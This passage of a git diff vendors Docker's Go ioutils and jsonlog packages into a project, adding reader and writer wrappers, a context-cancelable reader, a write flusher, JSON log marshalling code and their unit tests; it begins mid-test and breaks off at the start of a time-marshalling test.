+func TestMultiReadSeekerSmallReads(t *testing.T) {
+	readers := []io.ReadSeeker{}
+	for i := 0; i < 10; i++ {
+		integer := make([]byte, 4, 4)
+		binary.BigEndian.PutUint32(integer, uint32(i))
+		readers = append(readers, bytes.NewReader(integer))
+	}
+
+	reader := MultiReadSeeker(readers...)
+	for i := 0; i < 10; i++ {
+		var integer uint32
+		if err := binary.Read(reader, binary.BigEndian, &integer); err != nil {
+			t.Fatalf("Read from NewMultiReadSeeker failed: %v", err)
+		}
+		if uint32(i) != integer {
+			t.Fatalf("Read wrong value from NewMultiReadSeeker: %d != %d", i, integer)
+		}
+	}
+}
diff --git a/vendor/github.com/docker/docker/pkg/ioutils/readers.go b/vendor/github.com/docker/docker/pkg/ioutils/readers.go
new file mode 100644
index 0000000000..63f3c07f46
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/ioutils/readers.go
@@ -0,0 +1,154 @@
+package ioutils
+
+import (
+	"crypto/sha256"
+	"encoding/hex"
+	"io"
+
+	"golang.org/x/net/context"
+)
+
+type readCloserWrapper struct {
+	io.Reader
+	closer func() error
+}
+
+func (r *readCloserWrapper) Close() error {
+	return r.closer()
+}
+
+// NewReadCloserWrapper returns a new io.ReadCloser.
+func NewReadCloserWrapper(r io.Reader, closer func() error) io.ReadCloser {
+	return &readCloserWrapper{
+		Reader: r,
+		closer: closer,
+	}
+}
+
+type readerErrWrapper struct {
+	reader io.Reader
+	closer func()
+}
+
+func (r *readerErrWrapper) Read(p []byte) (int, error) {
+	n, err := r.reader.Read(p)
+	if err != nil {
+		r.closer()
+	}
+	return n, err
+}
+
+// NewReaderErrWrapper returns a new io.Reader.
+func NewReaderErrWrapper(r io.Reader, closer func()) io.Reader {
+	return &readerErrWrapper{
+		reader: r,
+		closer: closer,
+	}
+}
+
+// HashData returns the sha256 sum of src.
+func HashData(src io.Reader) (string, error) {
+	h := sha256.New()
+	if _, err := io.Copy(h, src); err != nil {
+		return "", err
+	}
+	return "sha256:" + hex.EncodeToString(h.Sum(nil)), nil
+}
+
+// OnEOFReader wraps an io.ReadCloser and a function
+// the function will run at the end of file or close the file.
+type OnEOFReader struct {
+	Rc io.ReadCloser
+	Fn func()
+}
+
+func (r *OnEOFReader) Read(p []byte) (n int, err error) {
+	n, err = r.Rc.Read(p)
+	if err == io.EOF {
+		r.runFunc()
+	}
+	return
+}
+
+// Close closes the file and run the function.
+func (r *OnEOFReader) Close() error {
+	err := r.Rc.Close()
+	r.runFunc()
+	return err
+}
+
+func (r *OnEOFReader) runFunc() {
+	if fn := r.Fn; fn != nil {
+		fn()
+		r.Fn = nil
+	}
+}
+
+// cancelReadCloser wraps an io.ReadCloser with a context for cancelling read
+// operations.
+type cancelReadCloser struct {
+	cancel func()
+	pR     *io.PipeReader // Stream to read from
+	pW     *io.PipeWriter
+}
+
+// NewCancelReadCloser creates a wrapper that closes the ReadCloser when the
+// context is cancelled. The returned io.ReadCloser must be closed when it is
+// no longer needed.
+func NewCancelReadCloser(ctx context.Context, in io.ReadCloser) io.ReadCloser {
+	pR, pW := io.Pipe()
+
+	// Create a context used to signal when the pipe is closed
+	doneCtx, cancel := context.WithCancel(context.Background())
+
+	p := &cancelReadCloser{
+		cancel: cancel,
+		pR:     pR,
+		pW:     pW,
+	}
+
+	go func() {
+		_, err := io.Copy(pW, in)
+		select {
+		case <-ctx.Done():
+			// If the context was closed, p.closeWithError
+			// was already called. Calling it again would
+			// change the error that Read returns.
+		default:
+			p.closeWithError(err)
+		}
+		in.Close()
+	}()
+	go func() {
+		for {
+			select {
+			case <-ctx.Done():
+				p.closeWithError(ctx.Err())
+			case <-doneCtx.Done():
+				return
+			}
+		}
+	}()
+
+	return p
+}
+
+// Read wraps the Read method of the pipe that provides data from the wrapped
+// ReadCloser.
+func (p *cancelReadCloser) Read(buf []byte) (n int, err error) {
+	return p.pR.Read(buf)
+}
+
+// closeWithError closes the wrapper and its underlying reader. It will
+// cause future calls to Read to return err.
+func (p *cancelReadCloser) closeWithError(err error) {
+	p.pW.CloseWithError(err)
+	p.cancel()
+}
+
+// Close closes the wrapper its underlying reader. It will cause
+// future calls to Read to return io.EOF.
+func (p *cancelReadCloser) Close() error {
+	p.closeWithError(io.EOF)
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/pkg/ioutils/readers_test.go b/vendor/github.com/docker/docker/pkg/ioutils/readers_test.go
new file mode 100644
index 0000000000..9abc1054df
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/ioutils/readers_test.go
@@ -0,0 +1,94 @@
+package ioutils
+
+import (
+	"fmt"
+	"io/ioutil"
+	"strings"
+	"testing"
+	"time"
+
+	"golang.org/x/net/context"
+)
+
+// Implement io.Reader
+type errorReader struct{}
+
+func (r *errorReader) Read(p []byte) (int, error) {
+	return 0, fmt.Errorf("Error reader always fail.")
+}
+
+func TestReadCloserWrapperClose(t *testing.T) {
+	reader := strings.NewReader("A string reader")
+	wrapper := NewReadCloserWrapper(reader, func() error {
+		return fmt.Errorf("This will be called when closing")
+	})
+	err := wrapper.Close()
+	if err == nil || !strings.Contains(err.Error(), "This will be called when closing") {
+		t.Fatalf("readCloserWrapper should have call the anonymous func and thus, fail.")
+	}
+}
+
+func TestReaderErrWrapperReadOnError(t *testing.T) {
+	called := false
+	reader := &errorReader{}
+	wrapper := NewReaderErrWrapper(reader, func() {
+		called = true
+	})
+	_, err := wrapper.Read([]byte{})
+	if err == nil || !strings.Contains(err.Error(), "Error reader always fail.") {
+		t.Fatalf("readErrWrapper should returned an error")
+	}
+	if !called {
+		t.Fatalf("readErrWrapper should have call the anonymous function on failure")
+	}
+}
+
+func TestReaderErrWrapperRead(t *testing.T) {
+	reader := strings.NewReader("a string reader.")
+	wrapper := NewReaderErrWrapper(reader, func() {
+		t.Fatalf("readErrWrapper should not have called the anonymous function")
+	})
+	// Read 20 byte (should be ok with the string above)
+	num, err := wrapper.Read(make([]byte, 20))
+	if err != nil {
+		t.Fatal(err)
+	}
+	if num != 16 {
+		t.Fatalf("readerErrWrapper should have read 16 byte, but read %d", num)
+	}
+}
+
+func TestHashData(t *testing.T) {
+	reader := strings.NewReader("hash-me")
+	actual, err := HashData(reader)
+	if err != nil {
+		t.Fatal(err)
+	}
+	expected := "sha256:4d11186aed035cc624d553e10db358492c84a7cd6b9670d92123c144930450aa"
+	if actual != expected {
+		t.Fatalf("Expecting %s, got %s", expected, actual)
+	}
+}
+
+type perpetualReader struct{}
+
+func (p *perpetualReader) Read(buf []byte) (n int, err error) {
+	for i := 0; i != len(buf); i++ {
+		buf[i] = 'a'
+	}
+	return len(buf), nil
+}
+
+func TestCancelReadCloser(t *testing.T) {
+	ctx, _ := context.WithTimeout(context.Background(), 100*time.Millisecond)
+	cancelReadCloser := NewCancelReadCloser(ctx, ioutil.NopCloser(&perpetualReader{}))
+	for {
+		var buf [128]byte
+		_, err := cancelReadCloser.Read(buf[:])
+		if err == context.DeadlineExceeded {
+			break
+		} else if err != nil {
+			t.Fatalf("got unexpected error: %v", err)
+		}
+	}
+}
diff --git a/vendor/github.com/docker/docker/pkg/ioutils/temp_unix.go b/vendor/github.com/docker/docker/pkg/ioutils/temp_unix.go
new file mode 100644
index 0000000000..1539ad21b5
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/ioutils/temp_unix.go
@@ -0,0 +1,10 @@
+// +build !windows
+
+package ioutils
+
+import "io/ioutil"
+
+// TempDir on Unix systems is equivalent to ioutil.TempDir.
+func TempDir(dir, prefix string) (string, error) {
+	return ioutil.TempDir(dir, prefix)
+}
diff --git a/vendor/github.com/docker/docker/pkg/ioutils/temp_windows.go b/vendor/github.com/docker/docker/pkg/ioutils/temp_windows.go
new file mode 100644
index 0000000000..c258e5fdd8
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/ioutils/temp_windows.go
@@ -0,0 +1,18 @@
+// +build windows
+
+package ioutils
+
+import (
+	"io/ioutil"
+
+	"github.com/docker/docker/pkg/longpath"
+)
+
+// TempDir is the equivalent of ioutil.TempDir, except that the result is in Windows longpath format.
+func TempDir(dir, prefix string) (string, error) {
+	tempDir, err := ioutil.TempDir(dir, prefix)
+	if err != nil {
+		return "", err
+	}
+	return longpath.AddPrefix(tempDir), nil
+}
diff --git a/vendor/github.com/docker/docker/pkg/ioutils/writeflusher.go b/vendor/github.com/docker/docker/pkg/ioutils/writeflusher.go
new file mode 100644
index 0000000000..52a4901ade
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/ioutils/writeflusher.go
@@ -0,0 +1,92 @@
+package ioutils
+
+import (
+	"io"
+	"sync"
+)
+
+// WriteFlusher wraps the Write and Flush operation ensuring that every write
+// is a flush. In addition, the Close method can be called to intercept
+// Read/Write calls if the targets lifecycle has already ended.
+type WriteFlusher struct {
+	w           io.Writer
+	flusher     flusher
+	flushed     chan struct{}
+	flushedOnce sync.Once
+	closed      chan struct{}
+	closeLock   sync.Mutex
+}
+
+type flusher interface {
+	Flush()
+}
+
+var errWriteFlusherClosed = io.EOF
+
+func (wf *WriteFlusher) Write(b []byte) (n int, err error) {
+	select {
+	case <-wf.closed:
+		return 0, errWriteFlusherClosed
+	default:
+	}
+
+	n, err = wf.w.Write(b)
+	wf.Flush() // every write is a flush.
+	return n, err
+}
+
+// Flush the stream immediately.
+func (wf *WriteFlusher) Flush() {
+	select {
+	case <-wf.closed:
+		return
+	default:
+	}
+
+	wf.flushedOnce.Do(func() {
+		close(wf.flushed)
+	})
+	wf.flusher.Flush()
+}
+
+// Flushed returns the state of flushed.
+// If it's flushed, return true, or else it return false.
+func (wf *WriteFlusher) Flushed() bool {
+	// BUG(stevvooe): Remove this method. Its use is inherently racy. Seems to
+	// be used to detect whether or a response code has been issued or not.
+	// Another hook should be used instead.
+	var flushed bool
+	select {
+	case <-wf.flushed:
+		flushed = true
+	default:
+	}
+	return flushed
+}
+
+// Close closes the write flusher, disallowing any further writes to the
+// target. After the flusher is closed, all calls to write or flush will
+// result in an error.
+func (wf *WriteFlusher) Close() error {
+	wf.closeLock.Lock()
+	defer wf.closeLock.Unlock()
+
+	select {
+	case <-wf.closed:
+		return errWriteFlusherClosed
+	default:
+		close(wf.closed)
+	}
+	return nil
+}
+
+// NewWriteFlusher returns a new WriteFlusher.
+func NewWriteFlusher(w io.Writer) *WriteFlusher {
+	var fl flusher
+	if f, ok := w.(flusher); ok {
+		fl = f
+	} else {
+		fl = &NopFlusher{}
+	}
+	return &WriteFlusher{w: w, flusher: fl, closed: make(chan struct{}), flushed: make(chan struct{})}
+}
diff --git a/vendor/github.com/docker/docker/pkg/ioutils/writers.go b/vendor/github.com/docker/docker/pkg/ioutils/writers.go
new file mode 100644
index 0000000000..ccc7f9c23e
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/ioutils/writers.go
@@ -0,0 +1,66 @@
+package ioutils
+
+import "io"
+
+// NopWriter represents a type which write operation is nop.
+type NopWriter struct{}
+
+func (*NopWriter) Write(buf []byte) (int, error) {
+	return len(buf), nil
+}
+
+type nopWriteCloser struct {
+	io.Writer
+}
+
+func (w *nopWriteCloser) Close() error { return nil }
+
+// NopWriteCloser returns a nopWriteCloser.
+func NopWriteCloser(w io.Writer) io.WriteCloser {
+	return &nopWriteCloser{w}
+}
+
+// NopFlusher represents a type which flush operation is nop.
+type NopFlusher struct{}
+
+// Flush is a nop operation.
+func (f *NopFlusher) Flush() {}
+
+type writeCloserWrapper struct {
+	io.Writer
+	closer func() error
+}
+
+func (r *writeCloserWrapper) Close() error {
+	return r.closer()
+}
+
+// NewWriteCloserWrapper returns a new io.WriteCloser.
+func NewWriteCloserWrapper(r io.Writer, closer func() error) io.WriteCloser {
+	return &writeCloserWrapper{
+		Writer: r,
+		closer: closer,
+	}
+}
+
+// WriteCounter wraps a concrete io.Writer and hold a count of the number
+// of bytes written to the writer during a "session".
+// This can be convenient when write return is masked
+// (e.g., json.Encoder.Encode())
+type WriteCounter struct {
+	Count  int64
+	Writer io.Writer
+}
+
+// NewWriteCounter returns a new WriteCounter.
+func NewWriteCounter(w io.Writer) *WriteCounter {
+	return &WriteCounter{
+		Writer: w,
+	}
+}
+
+func (wc *WriteCounter) Write(p []byte) (count int, err error) {
+	count, err = wc.Writer.Write(p)
+	wc.Count += int64(count)
+	return
+}
diff --git a/vendor/github.com/docker/docker/pkg/ioutils/writers_test.go b/vendor/github.com/docker/docker/pkg/ioutils/writers_test.go
new file mode 100644
index 0000000000..564b1cd4f5
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/ioutils/writers_test.go
@@ -0,0 +1,65 @@
+package ioutils
+
+import (
+	"bytes"
+	"strings"
+	"testing"
+)
+
+func TestWriteCloserWrapperClose(t *testing.T) {
+	called := false
+	writer := bytes.NewBuffer([]byte{})
+	wrapper := NewWriteCloserWrapper(writer, func() error {
+		called = true
+		return nil
+	})
+	if err := wrapper.Close(); err != nil {
+		t.Fatal(err)
+	}
+	if !called {
+		t.Fatalf("writeCloserWrapper should have call the anonymous function.")
+	}
+}
+
+func TestNopWriteCloser(t *testing.T) {
+	writer := bytes.NewBuffer([]byte{})
+	wrapper := NopWriteCloser(writer)
+	if err := wrapper.Close(); err != nil {
+		t.Fatal("NopWriteCloser always return nil on Close.")
+	}
+
+}
+
+func TestNopWriter(t *testing.T) {
+	nw := &NopWriter{}
+	l, err := nw.Write([]byte{'c'})
+	if err != nil {
+		t.Fatal(err)
+	}
+	if l != 1 {
+		t.Fatalf("Expected 1 got %d", l)
+	}
+}
+
+func TestWriteCounter(t *testing.T) {
+	dummy1 := "This is a dummy string."
+	dummy2 := "This is another dummy string."
+	totalLength := int64(len(dummy1) + len(dummy2))
+
+	reader1 := strings.NewReader(dummy1)
+	reader2 := strings.NewReader(dummy2)
+
+	var buffer bytes.Buffer
+	wc := NewWriteCounter(&buffer)
+
+	reader1.WriteTo(wc)
+	reader2.WriteTo(wc)
+
+	if wc.Count != totalLength {
+		t.Errorf("Wrong count: %d vs. %d", wc.Count, totalLength)
+	}
+
+	if buffer.String() != dummy1+dummy2 {
+		t.Error("Wrong message written")
+	}
+}
diff --git a/vendor/github.com/docker/docker/pkg/jsonlog/jsonlog.go b/vendor/github.com/docker/docker/pkg/jsonlog/jsonlog.go
new file mode 100644
index 0000000000..4734c31119
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/jsonlog/jsonlog.go
@@ -0,0 +1,42 @@
+package jsonlog
+
+import (
+	"encoding/json"
+	"fmt"
+	"time"
+)
+
+// JSONLog represents a log message, typically a single entry from a given log stream.
+// JSONLogs can be easily serialized to and from JSON and support custom formatting.
+type JSONLog struct {
+	// Log is the log message
+	Log string `json:"log,omitempty"`
+	// Stream is the log source
+	Stream string `json:"stream,omitempty"`
+	// Created is the created timestamp of log
+	Created time.Time `json:"time"`
+	// Attrs is the list of extra attributes provided by the user
+	Attrs map[string]string `json:"attrs,omitempty"`
+}
+
+// Format returns the log formatted according to format
+// If format is nil, returns the log message
+// If format is json, returns the log marshaled in json format
+// By default, returns the log with the log time formatted according to format.
+func (jl *JSONLog) Format(format string) (string, error) {
+	if format == "" {
+		return jl.Log, nil
+	}
+	if format == "json" {
+		m, err := json.Marshal(jl)
+		return string(m), err
+	}
+	return fmt.Sprintf("%s %s", jl.Created.Format(format), jl.Log), nil
+}
+
+// Reset resets the log to nil.
+func (jl *JSONLog) Reset() {
+	jl.Log = ""
+	jl.Stream = ""
+	jl.Created = time.Time{}
+}
diff --git a/vendor/github.com/docker/docker/pkg/jsonlog/jsonlog_marshalling.go b/vendor/github.com/docker/docker/pkg/jsonlog/jsonlog_marshalling.go
new file mode 100644
index 0000000000..83ce684a8e
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/jsonlog/jsonlog_marshalling.go
@@ -0,0 +1,178 @@
+// This code was initially generated by ffjson <https://github.com/pquerna/ffjson>
+// This code was generated via the following steps:
+// $ go get -u github.com/pquerna/ffjson
+// $ make BIND_DIR=. shell
+// $ ffjson pkg/jsonlog/jsonlog.go
+// $ mv pkg/jsonglog/jsonlog_ffjson.go pkg/jsonlog/jsonlog_marshalling.go
+//
+// It has been modified to improve the performance of time marshalling to JSON
+// and to clean it up.
+// Should this code need to be regenerated when the JSONLog struct is changed,
+// the relevant changes which have been made are:
+// import (
+//        "bytes"
+//-
+//        "unicode/utf8"
+// )
+//
+// func (mj *JSONLog) MarshalJSON() ([]byte, error) {
+//@@ -20,13 +16,13 @@ func (mj *JSONLog) MarshalJSON() ([]byte, error) {
+//        }
+//        return buf.Bytes(), nil
+// }
+//+
+// func (mj *JSONLog) MarshalJSONBuf(buf *bytes.Buffer) error {
+//-       var err error
+//-       var obj []byte
+//-       var first bool = true
+//-       _ = obj
+//-       _ = err
+//-       _ = first
+//+       var (
+//+               err       error
+//+               timestamp string
+//+               first     bool = true
+//+       )
+//        buf.WriteString(`{`)
+//        if len(mj.Log) != 0 {
+//                if first == true {
+//@@ -52,11 +48,11 @@ func (mj *JSONLog) MarshalJSONBuf(buf *bytes.Buffer) error {
+//                buf.WriteString(`,`)
+//        }
+//        buf.WriteString(`"time":`)
+//-       obj, err = mj.Created.MarshalJSON()
+//+       timestamp, err = FastTimeMarshalJSON(mj.Created)
+//        if err != nil {
+//                return err
+//        }
+//-       buf.Write(obj)
+//+       buf.WriteString(timestamp)
+//        buf.WriteString(`}`)
+//        return nil
+// }
+// @@ -81,9 +81,10 @@ func (mj *JSONLog) MarshalJSONBuf(buf *bytes.Buffer) error {
+//         if len(mj.Log) != 0 {
+// -                if first == true {
+// -                       first = false
+// -               } else {
+// -                       buf.WriteString(`,`)
+// -               }
+// +               first = false
+//                 buf.WriteString(`"log":`)
+//                 ffjsonWriteJSONString(buf, mj.Log)
+//         }
+
+package jsonlog
+
+import (
+	"bytes"
+	"unicode/utf8"
+)
+
+// MarshalJSON marshals the JSONLog.
+func (mj *JSONLog) MarshalJSON() ([]byte, error) {
+	var buf bytes.Buffer
+	buf.Grow(1024)
+	if err := mj.MarshalJSONBuf(&buf); err != nil {
+		return nil, err
+	}
+	return buf.Bytes(), nil
+}
+
+// MarshalJSONBuf marshals the JSONLog and stores the result to a bytes.Buffer.
+func (mj *JSONLog) MarshalJSONBuf(buf *bytes.Buffer) error {
+	var (
+		err       error
+		timestamp string
+		first     = true
+	)
+	buf.WriteString(`{`)
+	if len(mj.Log) != 0 {
+		first = false
+		buf.WriteString(`"log":`)
+		ffjsonWriteJSONString(buf, mj.Log)
+	}
+	if len(mj.Stream) != 0 {
+		if first {
+			first = false
+		} else {
+			buf.WriteString(`,`)
+		}
+		buf.WriteString(`"stream":`)
+		ffjsonWriteJSONString(buf, mj.Stream)
+	}
+	if !first {
+		buf.WriteString(`,`)
+	}
+	buf.WriteString(`"time":`)
+	timestamp, err = FastTimeMarshalJSON(mj.Created)
+	if err != nil {
+		return err
+	}
+	buf.WriteString(timestamp)
+	buf.WriteString(`}`)
+	return nil
+}
+
+func ffjsonWriteJSONString(buf *bytes.Buffer, s string) {
+	const hex = "0123456789abcdef"
+
+	buf.WriteByte('"')
+	start := 0
+	for i := 0; i < len(s); {
+		if b := s[i]; b < utf8.RuneSelf {
+			if 0x20 <= b && b != '\\' && b != '"' && b != '<' && b != '>' && b != '&' {
+				i++
+				continue
+			}
+			if start < i {
+				buf.WriteString(s[start:i])
+			}
+			switch b {
+			case '\\', '"':
+				buf.WriteByte('\\')
+				buf.WriteByte(b)
+			case '\n':
+				buf.WriteByte('\\')
+				buf.WriteByte('n')
+			case '\r':
+				buf.WriteByte('\\')
+				buf.WriteByte('r')
+			default:
+
+				buf.WriteString(`\u00`)
+				buf.WriteByte(hex[b>>4])
+				buf.WriteByte(hex[b&0xF])
+			}
+			i++
+			start = i
+			continue
+		}
+		c, size := utf8.DecodeRuneInString(s[i:])
+		if c == utf8.RuneError && size == 1 {
+			if start < i {
+				buf.WriteString(s[start:i])
+			}
+			buf.WriteString(`\ufffd`)
+			i += size
+			start = i
+			continue
+		}
+
+		if c == '\u2028' || c == '\u2029' {
+			if start < i {
+				buf.WriteString(s[start:i])
+			}
+			buf.WriteString(`\u202`)
+			buf.WriteByte(hex[c&0xF])
+			i += size
+			start = i
+			continue
+		}
+		i += size
+	}
+	if start < len(s) {
+		buf.WriteString(s[start:])
+	}
+	buf.WriteByte('"')
+}
diff --git a/vendor/github.com/docker/docker/pkg/jsonlog/jsonlog_marshalling_test.go b/vendor/github.com/docker/docker/pkg/jsonlog/jsonlog_marshalling_test.go
new file mode 100644
index 0000000000..3edb271410
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/jsonlog/jsonlog_marshalling_test.go
@@ -0,0 +1,34 @@
+package jsonlog
+
+import (
+	"regexp"
+	"testing"
+)
+
+func TestJSONLogMarshalJSON(t *testing.T) {
+	logs := map[*JSONLog]string{
+		&JSONLog{Log: `"A log line with \\"`}:           `^{\"log\":\"\\\"A log line with \\\\\\\\\\\"\",\"time\":\".{20,}\"}$`,
+		&JSONLog{Log: "A log line"}:                     `^{\"log\":\"A log line\",\"time\":\".{20,}\"}$`,
+		&JSONLog{Log: "A log line with \r"}:             `^{\"log\":\"A log line with \\r\",\"time\":\".{20,}\"}$`,
+		&JSONLog{Log: "A log line with & < >"}:          `^{\"log\":\"A log line with \\u0026 \\u003c \\u003e\",\"time\":\".{20,}\"}$`,
+		&JSONLog{Log: "A log line with utf8 : 🚀 ψ ω β"}: `^{\"log\":\"A log line with utf8 : 🚀 ψ ω β\",\"time\":\".{20,}\"}$`,
+		&JSONLog{Stream: "stdout"}:                      `^{\"stream\":\"stdout\",\"time\":\".{20,}\"}$`,
+		&JSONLog{}:                                      `^{\"time\":\".{20,}\"}$`,
+		// These ones are a little weird
+		&JSONLog{Log: "\u2028 \u2029"}:      `^{\"log\":\"\\u2028 \\u2029\",\"time\":\".{20,}\"}$`,
+		&JSONLog{Log: string([]byte{0xaF})}: `^{\"log\":\"\\ufffd\",\"time\":\".{20,}\"}$`,
+		&JSONLog{Log: string([]byte{0x7F})}: `^{\"log\":\"\x7f\",\"time\":\".{20,}\"}$`,
+	}
+	for jsonLog, expression := range logs {
+		data, err := jsonLog.MarshalJSON()
+		if err != nil {
+			t.Fatal(err)
+		}
+		res := string(data)
+		t.Logf("Result of WriteLog: %q", res)
+		logRe := regexp.MustCompile(expression)
+		if !logRe.MatchString(res) {
+			t.Fatalf("Log line not in expected format [%v]: %q", expression, res)
+		}
+	}
+}
diff --git a/vendor/github.com/docker/docker/pkg/jsonlog/jsonlogbytes.go b/vendor/github.com/docker/docker/pkg/jsonlog/jsonlogbytes.go
new file mode 100644
index 0000000000..df522c0d66
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/jsonlog/jsonlogbytes.go
@@ -0,0 +1,122 @@
+package jsonlog
+
+import (
+	"bytes"
+	"encoding/json"
+	"unicode/utf8"
+)
+
+// JSONLogs is based on JSONLog.
+// It allows marshalling JSONLog from Log as []byte
+// and an already marshalled Created timestamp.
+type JSONLogs struct {
+	Log     []byte `json:"log,omitempty"`
+	Stream  string `json:"stream,omitempty"`
+	Created string `json:"time"`
+
+	// json-encoded bytes
+	RawAttrs json.RawMessage `json:"attrs,omitempty"`
+}
+
+// MarshalJSONBuf is based on the same method from JSONLog
+// It has been modified to take into account the necessary changes.
+func (mj *JSONLogs) MarshalJSONBuf(buf *bytes.Buffer) error {
+	var first = true
+
+	buf.WriteString(`{`)
+	if len(mj.Log) != 0 {
+		first = false
+		buf.WriteString(`"log":`)
+		ffjsonWriteJSONBytesAsString(buf, mj.Log)
+	}
+	if len(mj.Stream) != 0 {
+		if first == true {
+			first = false
+		} else {
+			buf.WriteString(`,`)
+		}
+		buf.WriteString(`"stream":`)
+		ffjsonWriteJSONString(buf, mj.Stream)
+	}
+	if len(mj.RawAttrs) > 0 {
+		if first {
+			first = false
+		} else {
+			buf.WriteString(`,`)
+		}
+		buf.WriteString(`"attrs":`)
+		buf.Write(mj.RawAttrs)
+	}
+	if !first {
+		buf.WriteString(`,`)
+	}
+	buf.WriteString(`"time":`)
+	buf.WriteString(mj.Created)
+	buf.WriteString(`}`)
+	return nil
+}
+
+// This is based on ffjsonWriteJSONBytesAsString. It has been changed
+// to accept a string passed as a slice of bytes.
+func ffjsonWriteJSONBytesAsString(buf *bytes.Buffer, s []byte) {
+	const hex = "0123456789abcdef"
+
+	buf.WriteByte('"')
+	start := 0
+	for i := 0; i < len(s); {
+		if b := s[i]; b < utf8.RuneSelf {
+			if 0x20 <= b && b != '\\' && b != '"' && b != '<' && b != '>' && b != '&' {
+				i++
+				continue
+			}
+			if start < i {
+				buf.Write(s[start:i])
+			}
+			switch b {
+			case '\\', '"':
+				buf.WriteByte('\\')
+				buf.WriteByte(b)
+			case '\n':
+				buf.WriteByte('\\')
+				buf.WriteByte('n')
+			case '\r':
+				buf.WriteByte('\\')
+				buf.WriteByte('r')
+			default:
+
+				buf.WriteString(`\u00`)
+				buf.WriteByte(hex[b>>4])
+				buf.WriteByte(hex[b&0xF])
+			}
+			i++
+			start = i
+			continue
+		}
+		c, size := utf8.DecodeRune(s[i:])
+		if c == utf8.RuneError && size == 1 {
+			if start < i {
+				buf.Write(s[start:i])
+			}
+			buf.WriteString(`\ufffd`)
+			i += size
+			start = i
+			continue
+		}
+
+		if c == '\u2028' || c == '\u2029' {
+			if start < i {
+				buf.Write(s[start:i])
+			}
+			buf.WriteString(`\u202`)
+			buf.WriteByte(hex[c&0xF])
+			i += size
+			start = i
+			continue
+		}
+		i += size
+	}
+	if start < len(s) {
+		buf.Write(s[start:])
+	}
+	buf.WriteByte('"')
+}
diff --git a/vendor/github.com/docker/docker/pkg/jsonlog/jsonlogbytes_test.go b/vendor/github.com/docker/docker/pkg/jsonlog/jsonlogbytes_test.go
new file mode 100644
index 0000000000..6d6ad21583
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/jsonlog/jsonlogbytes_test.go
@@ -0,0 +1,39 @@
+package jsonlog
+
+import (
+	"bytes"
+	"regexp"
+	"testing"
+)
+
+func TestJSONLogsMarshalJSONBuf(t *testing.T) {
+	logs := map[*JSONLogs]string{
+		&JSONLogs{Log: []byte(`"A log line with \\"`)}:           `^{\"log\":\"\\\"A log line with \\\\\\\\\\\"\",\"time\":}$`,
+		&JSONLogs{Log: []byte("A log line")}:                     `^{\"log\":\"A log line\",\"time\":}$`,
+		&JSONLogs{Log: []byte("A log line with \r")}:             `^{\"log\":\"A log line with \\r\",\"time\":}$`,
+		&JSONLogs{Log: []byte("A log line with & < >")}:          `^{\"log\":\"A log line with \\u0026 \\u003c \\u003e\",\"time\":}$`,
+		&JSONLogs{Log: []byte("A log line with utf8 : 🚀 ψ ω β")}: `^{\"log\":\"A log line with utf8 : 🚀 ψ ω β\",\"time\":}$`,
+		&JSONLogs{Stream: "stdout"}:                              `^{\"stream\":\"stdout\",\"time\":}$`,
+		&JSONLogs{Stream: "stdout", Log: []byte("A log line")}:   `^{\"log\":\"A log line\",\"stream\":\"stdout\",\"time\":}$`,
+		&JSONLogs{Created: "time"}:                               `^{\"time\":time}$`,
+		&JSONLogs{}:                                              `^{\"time\":}$`,
+		// These ones are a little weird
+		&JSONLogs{Log: []byte("\u2028 \u2029")}: `^{\"log\":\"\\u2028 \\u2029\",\"time\":}$`,
+		&JSONLogs{Log: []byte{0xaF}}:            `^{\"log\":\"\\ufffd\",\"time\":}$`,
+		&JSONLogs{Log: []byte{0x7F}}:            `^{\"log\":\"\x7f\",\"time\":}$`,
+		// with raw attributes
+		&JSONLogs{Log: []byte("A log line"), RawAttrs: []byte(`{"hello":"world","value":1234}`)}: `^{\"log\":\"A log line\",\"attrs\":{\"hello\":\"world\",\"value\":1234},\"time\":}$`,
+	}
+	for jsonLog, expression := range logs {
+		var buf bytes.Buffer
+		if err := jsonLog.MarshalJSONBuf(&buf); err != nil {
+			t.Fatal(err)
+		}
+		res := buf.String()
+		t.Logf("Result of WriteLog: %q", res)
+		logRe := regexp.MustCompile(expression)
+		if !logRe.MatchString(res) {
+			t.Fatalf("Log line not in expected format [%v]: %q", expression, res)
+		}
+	}
+}
diff --git a/vendor/github.com/docker/docker/pkg/jsonlog/time_marshalling.go b/vendor/github.com/docker/docker/pkg/jsonlog/time_marshalling.go
new file mode 100644
index 0000000000..2117338149
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/jsonlog/time_marshalling.go
@@ -0,0 +1,27 @@
+// Package jsonlog provides helper functions to parse and print time (time.Time) as JSON.
+package jsonlog
+
+import (
+	"errors"
+	"time"
+)
+
+const (
+	// RFC3339NanoFixed is our own version of RFC339Nano because we want one
+	// that pads the nano seconds part with zeros to ensure
+	// the timestamps are aligned in the logs.
+	RFC3339NanoFixed = "2006-01-02T15:04:05.000000000Z07:00"
+	// JSONFormat is the format used by FastMarshalJSON
+	JSONFormat = `"` + time.RFC3339Nano + `"`
+)
+
+// FastTimeMarshalJSON avoids one of the extra allocations that
+// time.MarshalJSON is making.
+func FastTimeMarshalJSON(t time.Time) (string, error) {
+	if y := t.Year(); y < 0 || y >= 10000 {
+		// RFC 3339 is clear that years are 4 digits exactly.
+		// See golang.org/issue/4556#c15 for more discussion.
+		return "", errors.New("time.MarshalJSON: year outside of range [0,9999]")
+	}
+	return t.Format(JSONFormat), nil
+}
diff --git a/vendor/github.com/docker/docker/pkg/jsonlog/time_marshalling_test.go b/vendor/github.com/docker/docker/pkg/jsonlog/time_marshalling_test.go
new file mode 100644
index 0000000000..02d0302c4a
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/jsonlog/time_marshalling_test.go
@@ -0,0 +1,47 @@
+package jsonlog
+
+import (
+	"testing"
+	"time"
+)
+
+// Testing to ensure 'year' fields is between 0 and 9999
